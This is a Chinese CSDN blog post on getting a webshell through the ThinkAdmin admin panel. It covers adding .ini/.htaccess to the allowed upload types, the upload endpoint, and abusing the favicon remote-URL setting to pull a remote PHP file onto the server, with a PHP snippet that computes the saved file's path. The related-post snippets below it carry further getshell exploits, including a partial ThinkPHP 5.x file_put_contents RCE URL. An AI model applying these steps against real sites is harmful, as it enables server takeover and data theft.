ThinkAdmin后台Getshell

已于 2024-02-22 08:54:53 修改
阅读量679 收藏 8
点赞数 8
文章标签: web安全 网络安全 php
于 2024-02-22 08:52:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hot_milk1/article/details/136224154
版权

文件上传+目录穿越Getshell

功能点:

系统管理->系统参数配置->本地服务器存储

修改其可允许的文件类型,php不允许,可添加inihtaccess,通过文件包含或者图片马的方式Getshell。

上传接口:/admin/api.upload/file

# 任意文件上传

系统参数配置中的浏览器小图标填写指定URL可远程下载文件至服务器:

文件路径可以计算:

<?php
function name(string $url, string $ext = '', string $pre = '', string $fun = 'md5'): string {
        [$hah, $ext] = [$fun($url), trim($ext ?: pathinfo($url, 4), '.\/')];
        $attr = [trim($pre, '.\\/'), substr($hah, 0, 2), substr($hah, 2, 30)];
        return trim(join('/', $attr), '/') . '.' . strtolower($ext ?: 'tmp');
}
// 远程URL
$url = "https://www.baidu.com/123.php";
echo '/upload/'.name($url,'','down/');
Pumpkin_Bridge
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
ThinkPHP v5.x命令执行利用工具(可getshell
Fly_鹏程万里
12-13 1万+
漏洞验证 命令执行 getshell 工具下载 https://download.csdn.net/download/fly_hps/10848910 免责声明 该工具只能授权验证网站漏洞和站长验证漏洞使用。 禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关...
ThinkAdmin后台管理系统
08-07
Think Admin 1.0 基于ThinkPHP5开发,初始的1.0版本没有开发成CMS,只是个后台管理系统,附带常用的功能,方便扩展使用。
Web安全基础学习:文件上传漏洞之目录穿越
最新发布
qq_51862722的博客
06-23 833
文件上传漏洞:字如其意,就是可能出现在一切允许上传文件的功能点。它是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
ThinkPHP 远程命令执行漏洞复现(GetShell)
热门推荐
xy_sugar的博客
12-14 28万+
漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。 漏洞危害 攻击者可通过该漏洞获取...
php &#x,ThinkPHP5.x.x各版本实战环境getshell
weixin_39536728的博客
04-08 170
#这个文章我之前在t00ls已经分享过了#内容只是对tp5的实战环境下getshell做的记录,中间遇到的一些小问题的突破,没啥技术含量-5.1.18http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&v...
php _get漏洞,thinkphp代码执行getshell的漏洞解决
weixin_35797900的博客
03-18 601
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
php getshell,CLTPHP_v5.5.3 前台Getshelll漏洞
weixin_36277530的博客
03-10 2397
默认后台地址: http://127.0.0.1/admin/login/index.html默认账号密码: 后台登录名:admin 密码:admin123代码分析1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行:在这段函数中,未经用户权限验证,获取表单内容,存在越权绕过上传的情况。我们继续跟进move函数:2、文件位置:/think/library...
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞分析 DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 ...
DolphinPHP 1.4.2(_1.4.5)后台 GetShell1
08-03
标题 "DolphinPHP 1.4.2(1.4.5)后台 GetShell1" 描述了一个针对DolphinPHP 1.4.2及其1.4.5之前的版本的安全漏洞,允许攻击者通过后台获取服务器权限,即GetShell。这个过程涉及到图片上传功能的滥用。 首先,...
dz 所有版本后台GET SHELL1
08-08
论坛系统在不同版本中存在的后台GET SHELL漏洞,以及如何利用这些漏洞获取WebshellWebshell是指攻击者在目标服务器上上传或创建的一个后门程序,允许远程控制服务器。 1. **Discuz! 6.0 和 Discuz! 7.0 漏洞利用*...
gentlexue#POC-3#Discuz 3.4 最新版后台getshell1
07-25
Discuz 3.4 最新版后台getshell详情可以看这篇文章:
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
文件操作安全之-目录穿越原理篇
村中少年的专栏
10-12 2167
从目录穿越的定义,目录穿越的漏洞原理,目录穿越漏洞的具体案例,例如Apache http服务器CVE-2021-41773和CVE-2021-42013目录穿越漏洞,以及目录穿越漏洞潜在的危害阐述目录穿越漏洞中的安全问题。
【漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1656
【thinkcmf-文件包含】public函数
文件操作安全之-目录穿越流量告警运营分析篇
A_991128a的博客
04-14 692
目录穿越,也可以称之为路径遍历或目录遍历。通过利用输入验证不足,在输入中包含特殊字符或构造恶意的路径,绕过目录访问控制,访问目标系统上的文件或目录。由于这类问题在WEB网站的发展历史中,频繁地出现于各种业务环境中。因此在网络安全领域,逐渐形成了目录穿越这一类的漏洞,关于目录穿越漏洞的原理详见这里,如果想详细的了解目录穿越的原理,和对应的漏洞举例,可以移步到前面的文章。
春秋云镜 CVE-2020-25540
qq_22002773的博客
08-07 584
春秋云镜 CVE-2020-25540
Onethink管理平台后台可get webshell
chaojixiaojingang
04-26 1859
1)搭建好平台,访问登陆页面 2)登录后台,漏洞在扩展功能处,新建名称为test的插件,在是否需要配置处输入一句话木马 3)保存后扩展功能插件管理处会增加test插件信息 4)在网站Addons目录下创建一个test文件夹,config.php内容就是写入的一句话木马 5)用工具连接config.php文件,获取webshell ...
thinkadmin的CKEDITOR扩展多图上传
博客不一定要自己做
08-11 1271
!(function () { // 定义编辑器标准配置 CKEDITOR.editorConfig = function (config) { config.language = 'zh-cn'; config.toolbar = [ {name: 'document', items: ['Source']}, ...
文件上传漏洞原理与利用
cangyu51462的博客
05-15 1243
文件上传漏洞原理与利用
低权限后台getshell是微擎cms存在的后台漏洞吗
06-06
微擎CMS存在一些后台漏洞,但是不是所有的漏洞都能导致低权限后台getshell。一些漏洞可能只能导致信息泄漏、XSS等安全问题,而无法实现getshell。如果您想了解具体的微擎CMS后台漏洞信息,建议查阅相关安全研究报告或者官方公告。同时,为了保障您的网站安全,建议您及时升级微擎CMS到最新版本,并加强网站的安全防护措施。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值